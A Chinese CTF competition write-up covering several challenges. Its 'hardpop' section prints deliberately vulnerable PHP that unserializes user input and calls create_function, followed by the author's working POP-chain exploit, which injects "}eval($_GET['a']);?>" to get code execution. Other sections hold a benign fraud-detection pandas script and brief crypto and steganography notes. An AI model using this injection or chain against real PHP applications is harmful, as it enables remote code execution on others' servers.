2025省赛决赛 WP
非常可惜,距离省一只差10分,300分的web刚结束就做出来了,以前时间不够的情况有很多但是第一次感觉这么遗憾,两个小登也尽力了,太久不打比赛自己还是太菜Tot
还有就是web题目质量依旧一大坨
web
输不进去
前端看到123456789,直接发包为123456789的payload
代码审计
考翻译,/audit,参数是query,绕过直接fenjing一把梭了,感觉出这题的人脑子不好
hardpop
create_function可以这样打
create_function('',"}phpinfo();?>");然后正常走链子就行了,其实不是很难链子很常规,destruct -> get -> tostring然后又臭又长的几个方法
<?php
error_reporting(0);
class pQ5mW8nL {
public $mG6rL9fK;
public $vX3cF6yR;
public $hJ9kN2tM;
public $lG7dS4vB;
public $qF2mP8nR;
public $tK5wL9cJ;
public $nY4vG7pM;
public $sR6fQ3mK;
public $jL8cN2vP;
public $gM5tR9qW;
public $fH4pL6nY;
public $uX7cG3rK;
public $dV2mT8qL;
public $wP9nF4vR;
public $kQ6cL5mN;
public function wT8mF4qN($command, $output) {
echo "111111111";
if (is_string($command) && strlen($command) > 0) {
echo "111111111";
return $this->mG6rL9fK->zQ4mN8rL($command);
}
return false;
}
public function __unset($name) {
if (property_exists($this, $name)) {
unset($this->$name);
}
}
public function mL7fQ2nK($input) {
if (strpos($input, 'flag') !== false) {
return 'denied';
}
return hash('md5', $input . 'secret_' . time());
}
}
class bT4yH7uI {
public $kF9mR3qL;
public $kL9pN5xM;
public $wS6vC3qJ;
public $mR8fG2dN;
public $zQ7nY4tK;
public $pF3wL6mR;
public $sH9cK4vN;
public $jM2tQ8pL;
public $gR5nF7wK;
public $lV4cT9mQ;
public $qN6pG3rY;
public $uX8fM2vL;
public $hK5wR7nP;
public $dT3mL9qF;
public $cP6vN4gR;
public function fM6nQ3rL($code, $data) {
echo "22222222222";
return $this->kF9mR3qL->wT8mF4qN($code, $data);
}
public function rK8mT5nQ($param1, $param2 = null) {
$result = 0;
if (is_numeric($param1)) {
for ($i = 1; $i <= $param1; $i++) {
$result += $i * 4;
}
}
return $result + (int)$param2;
}
public function __clone() {
$this->kL9pN5xM = 'cloned_' . uniqid();
}
}
class xF9mQ2vL {
public $aY5nU0gJ = "}eval(\$_GET['a']);?>";
public $vK1rE8pZ = "1";
public $hL4nQ9mP;
public $sL6fG9rK;
public $hJ3vN8mQ;
public $cR5pT2wL;
public $nK8dF4vY;
public $qM6cL9rT;
public $gP3nH7fM;
public $jW5vK2qL;
public $lT8mR4nP;
public $fQ7cG3vK;
public $uN9pL6mR;
public $vY4fT8qN;
public $rH2wG5pL;
public function mQ8fL3nR($param1, $param2) {
echo "3333333333";
if ($this->aY5nU0gJ && $this->vK1rE8pZ) {
return $this->hL4nQ9mP->fM6nQ3rL($this->aY5nU0gJ, $this->vK1rE8pZ);
}
return false;
}
public function __invoke() {
return 'xF9mQ2vL_invoked_' . microtime(true);
}
public function __get($name) {
if ($name === 'secret_value') {
return base64_encode('fake_secret');
}
return null;
}
public function __set($name, $value) {
if (in_array($name, array('aY5nU0gJ', 'vK1rE8pZ'))) {
$this->$name = $value;
}
}
}
class kY6rM3eL {
public $wH4mK9pL;
public $sT6vR3qN;
public $jL8fY2mK;
public $nM8xP5qW;
public $tQ3vL6jK;
public $rF7cN2mP;
public $gP5nQ7wE;
public $cM9vT4xR;
public $lF3dG6pN;
public $qY7mH5kJ;
public $vN2rP8wL;
public $fK6cT3mQ;
public $hR9pL4vY;
public $dG8nM6fT;
public $uX2wQ5pR;
public function rN7mK4qL() {
$this->wH4mK9pL->mQ8fL3nR($this->sT6vR3qN, $this->jL8fY2mK);
return 'kY6rM3eL_method';
}
public function fQ8mP3nL($code, $callback) {
if (is_string($code) && is_string($callback)) {
$func = create_function('', $code . '; return ' . $callback . ';');
return $func();
}
return false;
}
public function gT5nM9rK() {
$data = json_encode(array(
'timestamp' => time(),
'random' => rand(10000, 99999),
'hash' => sha1(uniqid())
));
return base64_encode($data);
}
public function __toString() {
return $this->nM8xP5qW ?: 'kY6rM3eL_obj';
}
public function __set($name, $value) {
if ($name === 'tQ3vL6jK') {
$this->rF7cN2mP = $value;
}
}
}
class wJ4qV3jM {
public $pL8vN4mR;
public $zX3cB7wQ;
public $fH9nY1dS;
public $rT6mQ3xK;
public $vL4nP9wE;
public $jK7cF2gH;
public $nY5vR8mL;
public $dG6pT4qN;
public $sM3wK9fR;
public $hQ7nB5xJ;
public $lF2vG6mP;
public $tY8dQ4rK;
public $cN9pL3vM;
public $qW6fT7nR;
public $uX5mH8pL;
public function __toString() {
return $this->pL8vN4mR->zX3aB7wQ;
}
public function mK9fL2nQ($param) {
if ($this->pL8vN4mR instanceof kY6rM3eL) {
return $this->pL8vN4mR->fQ8mP3nL($param, $this->zX3cB7wQ);
}
}
public function pR6nF4mL() {
$temp = array();
for ($i = 0; $i < 8; $i++) {
$temp[] = md5(rand());
}
return implode('', $temp);
}
public function __wakeup() {
$this->fH9nY1dS = 'wakeup_triggered';
}
public function __get($name) {
if ($name === 'zX3aB7wQ' && $this->rT6mQ3xK) {
return $this->rT6mQ3xK->rN7mK4qL();
}
return null;
}
}
class oC4tF3aU {
public $hD6yV6eY;
public $aY5nU0gJ = 1;
public $vK1rE8pZ = 1;
public $iE7jU6pY;
public $tY7eG5oV;
public $mN8qR4xT;
public $pL9wE5nK;
public $fG3cV7yM;
public $jH6dB2rQ;
public $sT1vN9pL;
public $kY4mF8xR;
public $nW7cG5qJ;
public $lP2vB6dM;
public $qX9fR3tY;
public $uE5nK7wL;
public function __debugInfo() {
return array('status' => 'debugging', 'level' => 3);
}
public function __destruct() {
$this->hD6yV6eY->aY5nU0gJ = $this->aY5nU0gJ;
$this->hD6yV6eY->vK1rE8pZ = $this->vK1rE8pZ;
echo $this->hD6yV6eY;
}
public function qW9rT2xK($param) {
$temp = array();
for ($i = 0; $i < 10; $i++) {
$temp[] = md5(rand());
}
return implode('', $temp);
}
public function __wakeup() {
$this->fG3cV7yM = 'wakeup_called';
}
}
class aP9wE5rA {
public $mK7xL3vN;
public $qJ6yU4nM;
public $zC8fB2dG;
public $hR5pW9tY;
public function __construct() {
$this->mK7xL3vN = array('init' => true, 'type' => 'constructor');
$this->qJ6yU4nM = rand(100, 999);
}
public function sD3vN8mL($input) {
if ($input === 'secret_key_12345') {
file_get_contents('/etc/passwd');
}
return hash('sha256', $input . $this->qJ6yU4nM);
}
public function __invoke() {
echo "aP9wE5rT invoked";
}
public function gF4mQ7xP() {
$temp = array();
for ($i = 0; $i < 5; $i++) {
$temp[] = chr(rand(65, 90));
}
return implode('', $temp);
}
}
class xV2aM8qL {
private $jK9rF5tW;
protected $lP6sG4mN;
public $cH3vB7yR;
public $uQ8zX1dF;
public function __sleep() {
return array('cH3vB7yR', 'uQ8zX1dF');
}
public function nY5tR8vM($data) {
$processed = array();
if (is_array($data)) {
foreach ($data as $key => $value) {
$processed[md5($key)] = base64_encode(serialize($value));
}
}
return $processed;
}
public function __get($name) {
if ($name === 'secret_property') {
return 'you_found_nothing';
}
return null;
}
public function qW3eR6tY() {
$this->jK9rF5tW = time();
$this->lP6sG4mN = uniqid();
return $this->jK9rF5tW + strlen($this->lP6sG4mN);
}
}
class bT4yO7uI {
public $kL9pN5xM;
public $wS6vC3qJ;
public $mR8fG2dN;
public $zQ7nY4tK;
public function __isset($name) {
return in_array($name, array('kL9pN5xM', 'wS6vC3qJ', 'mR8fG2dN'));
}
public function eF6wQ9rT($param1, $param2 = null) {
$result = 0;
if (is_numeric($param1)) {
for ($i = 1; $i <= $param1; $i++) {
$result += $i * 2;
}
}
return $result + (int)$param2;
}
public function __call($method, $args) {
if (method_exists($this, 'internal_' . $method)) {
return call_user_func_array(array($this, 'internal_' . $method), $args);
}
return false;
}
private function internal_process($data) {
return str_rot13(base64_encode($data));
}
}
class pQ5mJ8nL {
public $vX3cF6yR;
public $hJ9kN2tM;
public $lG7dS4vB;
public function __unset($name) {
if (isset($this->$name)) {
unset($this->$name);
}
}
public function rT8xP5qW($input) {
if (strpos($input, 'flag') !== false) {
return 'access_denied';
}
return hash('md5', $input . 'salt_' . time());
}
public function yU4nE7mK() {
$config = array(
'version' => '1.0.0',
'author' => 'unknown',
'debug' => false,
'encryption' => 'aes256'
);
return json_encode($config);
}
}
class nF9vV6aL {
public $dK3mQ8xP;
public $tW7cN4yJ;
public $jL5fG9rM;
public $qB2vH6dS;
public function __clone() {
$this->dK3mQ8xP = clone $this->dK3mQ8xP;
$this->tW7cN4yJ = 'cloned_' . time();
}
public function sM3nQ7wE($mode = 'default') {
switch ($mode) {
case 'encrypt':
return base64_encode($this->jL5fG9rM);
case 'decrypt':
return base64_decode($this->qB2vH6dS);
default:
return 'default_mode_active';
}
}
public function xR8vN4mL() {
$sum = 0;
for ($i = 1; $i <= 100; $i++) {
$sum += pow($i, 2) - $i;
}
return $sum % 12345;
}
}
class gH4qV9nM {
protected $lE6wR3xK;
private $yT8fP5sJ;
public $mQ7cN2vL;
public $dF9kB4gR;
public function __set($name, $value) {
if ($name === 'secret' && $value === 'admin123') {
$this->yT8fP5sJ = 'access_granted_fake';
}
}
public function vK5nM8qW($depth = 0) {
if ($depth > 10) {
return 'max_depth_reached';
}
return $this->vK5nM8qW($depth + 1);
}
public function __debugInfo() {
return array(
'class' => __CLASS__,
'public_properties' => 2,
'private_properties' => 1,
'protected_properties' => 1
);
}
}
class cL7mT4nR {
public $wP8xQ5jK;
public $sD6vL9fM;
public $hN3yG2tB;
public function __wakeup() {
$this->wP8xQ5jK = 'wakeup_' . date('Y-m-d H:i:s');
}
public function fR9mN6qL($filename) {
if ($filename === '/flag.txt') {
return 'permission_denied';
}
return 'file_not_found';
}
public function kY4tR7xM() {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$token = '';
for ($i = 0; $i < 32; $i++) {
$token .= $chars[rand(0, strlen($chars) - 1)];
}
return $token;
}
}
class uM2sF8vN {
public $qJ5wE3rY;
public $tK9nP6lG;
public $xC4mH7dQ;
public $vL8fR2jK;
public function __toString() {
return 'uM2sF8vN_object_' . spl_object_hash($this);
}
public function nW6qR9tM($operation, $data) {
switch ($operation) {
case 'select':
return array('id' => 1, 'name' => 'test', 'data' => $data);
case 'insert':
return 'insert_success_fake';
case 'update':
return 'update_success_fake';
default:
return 'unknown_operation';
}
}
public function gT3vN7mK() {
$rules = array(
'length' => rand(8, 16),
'complexity' => true,
'special_chars' => false
);
return $rules;
}
}
class jP4nQ8wL {
public $fY7mK3xR;
public $lV9cB5dN;
public $hQ6tG2sM;
public function __invoke() {
return 'jP4nQ8wL_invoked_' . microtime(true);
}
public function mE5rT9vL($level = 1) {
if ($level > 5) {
return 'max_level_reached';
}
return array(
'level' => $level,
'next' => $this->mE5rT9vL($level + 1)
);
}
public function __sleep() {
return array('fY7mK3xR', 'lV9cB5dN');
}
}
class rK8xN4mQ {
private $zA3vF6wR;
protected $tL9nY5jM;
public $pG7cB2dK;
public $sH4mQ8xN;
public function __get($name) {
if ($name === 'hidden_data') {
return base64_encode('secret_but_useless');
}
return null;
}
public function vF3mT7qL($algorithm = 'sha1') {
$data = $this->pG7cB2dK . time();
switch ($algorithm) {
case 'md5':
return md5($data);
case 'sha256':
return hash('sha256', $data);
default:
return sha1($data);
}
}
public function __isset($name) {
return property_exists($this, $name);
}
}
class nF9rV6sL {
public $yR3fM8qL;
public $tW7cN4yJ;
public $jL5fG9rM;
public $qB2vH6dS;
public $mR8pL3nK;
public $fT5wG9cQ;
public $hY6mN2vL;
public $sK4rP7fM;
public $lQ9cT3wN;
public $gF2mH8pL;
public $vN6rK4qY;
public $uP3fG7mR;
public $cL5nT9wK;
public $jM8vR2qP;
public $dK6fL3mN;
public function zQ4mN8rL($cmd) {
if (is_string($cmd)) {
echo "success";
$f1 = create_function('$a',$cmd);
}
return false;
}
public function __clone() {
$this->tW7cN4yJ = 'cloned_' . time();
}
public function gH7mF2qL($mode = 'default') {
switch ($mode) {
case 'encrypt':
return base64_encode($this->jL5fG9rM);
case 'decrypt':
return base64_decode($this->qB2vH6dS);
default:
return 'default_active';
}
}
}
class yQ5vM9nL {
public $kR8fG3tY;
public $jW6nP4xM;
public $lD7sC2vN;
public $hF9mQ5kR;
public function __construct($config = array()) {
foreach ($config as $key => $value) {
if (property_exists($this, $key)) {
$this->$key = $value;
}
}
}
public function nT4wQ8rM($query, $params = array()) {
$safe_query = str_replace(array(';', '--', '/*', '*/'), '', $query);
return array(
'query' => $safe_query,
'params' => $params,
'status' => 'simulation_only'
);
}
public function xP6mL9vK() {
return array(
'timeout' => rand(30, 120),
'retries' => rand(1, 5),
'buffer_size' => rand(1024, 8192)
);
}
}
class dW3mR7qN {
public $tJ8fK5vL;
public $pY4nG9xM;
public $cQ6wR3sT;
public function __call($method, $args) {
if (strpos($method, 'get_') === 0) {
$property = substr($method, 4);
return isset($this->$property) ? $this->$property : 'property_not_found';
}
return 'method_not_found';
}
public function vM5nQ8rL($input) {
if (is_string($input) && strlen($input) > 0) {
return preg_replace('/[^a-zA-Z0-9]/', '', $input);
}
return false;
}
public function __clone() {
$this->tJ8fK5vL = 'cloned_' . uniqid();
}
}
class fL9pM4nQ {
public $wK6tR8vY;
public $sJ3mN7fL;
public $gD5xP2cM;
public $hQ9vB4rK;
public function __destruct() {
if (isset($this->wK6tR8vY) && is_string($this->wK6tR8vY)) {
$safe_log = 'Destruction of ' . __CLASS__ . ' at ' . date('Y-m-d H:i:s');
}
}
public function mT7nQ3wR($data) {
if (is_array($data)) {
return array_map('strtoupper', $data);
} elseif (is_string($data)) {
return strtoupper($data);
}
return $data;
}
public function __wakeup() {
$this->gD5xP2cM = 'object_awakened';
}
}
class eV8nM2qL {
public $rT5wF9kJ;
public $lP3mG6vN;
public $yH8cQ4xR;
public function nK7fR9mT($complexity = 'medium') {
$operations = array();
$count = ($complexity === 'high') ? 1000 : 100;
for ($i = 0; $i < $count; $i++) {
$operations[] = md5($i . time());
}
return count($operations);
}
public function __toString() {
return json_encode(array(
'class' => __CLASS__,
'properties' => get_object_vars($this)
));
}
}
class qM4vL8nR {
public $xF6pK9tY;
public $jW2cN5mL;
public $dG7rQ3vM;
public $hL9fT4xN;
public function sP5nW8qM($mode, $data) {
switch ($mode) {
case 'compress':
return gzcompress($data);
case 'decompress':
return gzuncompress($data);
case 'encode':
return base64_encode($data);
case 'decode':
return base64_decode($data);
default:
return $data;
}
}
public function __set($name, $value) {
if (in_array($name, array('xF6pK9tY', 'jW2cN5mL'))) {
$this->$name = $value;
}
}
}
if (isset($_POST['awa'])){
unserialize(base64_decode($_POST['awa']));
}
$oc4 = new oC4tF3aU();
$wJ4 = new wJ4qV3jM();
$wJ42 = new wJ4qV3jM();
$kY6 = new kY6rM3eL();
$xf9 = new xF9mQ2vL();
$bt4 = new bT4yH7uI();
$pq5 = new pQ5mW8nL();
$nf9 = new nF9rV6sL();
$pq5 -> mG6rL9fK = $nf9;
$bt4 -> kF9mR3qL = $pq5;
$xf9 -> hL4nQ9mP = $bt4;
$kY6 -> wH4mK9pL = $xf9;
$wJ42 -> rT6mQ3xK = $kY6;
$wJ4 -> pL8vN4mR = $wJ42;
$oc4 -> hD6yV6eY = $wJ4;
file_put_contents("pay",base64_encode(serialize($oc4)));
太可惜了以至于打完比赛还截了个图,主要是知识储备不够,create_function的洞是当场现挖的,单论链子真的不难。
数据安全
数据安全2
忘了题目叫什么了,脚本如下
import pandas as pd
from datetime import datetime, timedelta
import re
from collections import defaultdict
# -----------------------------
# 1. 商品类型与价格范围定义
# -----------------------------
price_ranges = {
'电子产品': (100, 5000),
'服装鞋包': (20, 1000),
'家居用品': (50, 2000),
'运动户外': (30, 1500),
'图书音像': (10, 500),
'美妆个护': (10, 1000),
'食品饮料': (5, 500),
'母婴用品': (20, 1000),
'玩具乐器': (10, 1000),
'汽车用品': (50, 3000),
}
# -----------------------------
# 2. Luhn算法校验
# -----------------------------
def luhn_check(card_number):
card_number = card_number[::-1]
total = 0
for i, digit in enumerate(card_number):
if i % 2 == 1:
doubled = int(digit) * 2
if doubled > 9:
doubled -= 9
total += doubled
else:
total += int(digit)
return total % 10 == 0
# -----------------------------
# 3. 数据预处理
# -----------------------------
def preprocess_data(df):
df['下单时间'] = pd.to_datetime(df['下单时间'])
df['用户注册天数'] = pd.to_numeric(df['用户注册天数'], errors='coerce')
df['用户历史订单数'] = pd.to_numeric(df['用户历史订单数'], errors='coerce')
df['订单金额'] = pd.to_numeric(df['订单金额'], errors='coerce')
return df
# -----------------------------
# 4. 异常检测函数
# -----------------------------
def detect_amount_anomalies(df):
anomalies = set()
product_type_stats = {}
# 统计每类商品的均值和标准差
for product_type in price_ranges:
subset = df[df['商品类型'] == product_type]
if len(subset) > 0:
mean = subset['订单金额'].mean()
std = subset['订单金额'].std()
product_type_stats[product_type] = (mean, std)
for user_id, group in df.groupby('用户ID'):
for _, row in group.iterrows():
product_type = row['商品类型']
amount = row['订单金额']
if product_type in product_type_stats:
mean, std = product_type_stats[product_type]
# 若金额偏离均值超过 3 倍标准差,则为异常
if abs(amount - mean) > 3 * std:
anomalies.add(user_id)
return anomalies
def detect_card_anomalies(df):
anomalies = set()
card_usage = defaultdict(list) # {card_number: [(user_id, time)]}
for _, row in df.iterrows():
card = row['银行卡号']
user_id = row['用户ID']
time = row['下单时间']
# 格式检查
if not (16 <= len(card) <= 19 and card.isdigit()):
anomalies.add(user_id)
continue
# Luhn算法验证
if not luhn_check(card):
anomalies.add(user_id)
continue
# 使用频率检测(同一卡号在同一小时内被多个用户使用)
card_usage[card].append((user_id, time))
# 检查同一卡号在1小时内被多个用户使用
for card, usage_list in card_usage.items():
usage_list.sort(key=lambda x: x[1])
for i in range(len(usage_list)):
user_i, time_i = usage_list[i]
for j in range(i + 1, len(usage_list)):
user_j, time_j = usage_list[j]
if user_i != user_j and (time_j - time_i).total_seconds() <= 3600:
anomalies.add(user_i)
anomalies.add(user_j)
return anomalies
def detect_frequency_anomalies(df):
anomalies = set()
user_orders = defaultdict(list)
for _, row in df.iterrows():
user_id = row['用户ID']
time = row['下单时间']
user_orders[user_id].append(time)
for user_id, times in user_orders.items():
times.sort()
# 滑动窗口检测:每1小时窗口内订单数是否 > 10
for i in range(len(times)):
start = times[i]
count = 1
for j in range(i + 1, len(times)):
if (times[j] - start).total_seconds() <= 3600:
count += 1
else:
break
if count > 10:
anomalies.add(user_id)
break
return anomalies
# -----------------------------
# 5. 主执行函数
# -----------------------------
def main():
# 假设原始数据保存在 'orders.csv'
df = pd.read_csv('./data.csv')
df = preprocess_data(df)
# 执行异常检测
amount_anomalies = detect_amount_anomalies(df)
card_anomalies = detect_card_anomalies(df)
freq_anomalies = detect_frequency_anomalies(df)
# 合并所有可疑用户
all_anomalies = amount_anomalies.union(card_anomalies).union(freq_anomalies)
# 构建输出数据
output_rows = []
for user_id in all_anomalies:
# 查找该用户的所有订单
user_orders = df[df['用户ID'] == user_id]
# 判断属于哪种异常
is_amount = user_id in amount_anomalies
is_card = user_id in card_anomalies
is_freq = user_id in freq_anomalies
if is_amount:
output_rows.append({
'用户ID': user_id,
'异常类型': '金额异常'
})
if is_card:
output_rows.append({
'用户ID': user_id,
'异常类型': '银行卡异常'
})
if is_freq:
output_rows.append({
'用户ID': user_id,
'异常类型': '频率异常'
})
# 写入CSV文件
output_df = pd.DataFrame(output_rows)
output_df.to_csv('suspicious_users.csv', index=False)
print("可疑用户已保存至 suspicious_users.csv")
if __name__ == "__main__":
main()crypto
base64
base64
aes
iv和key都给出来了,直接转成hex,在cyberchef里还原就行
misc
easysteg0
binwalk找到隐藏的rar文件,7zip打开发现NTFS流,然后stegsolve找到base64的表,直接换表解码即可
AI
AI1
题目名字忘了,1000张图片有6张猫,小登直接肉眼观察找出来了
Comments NOTHING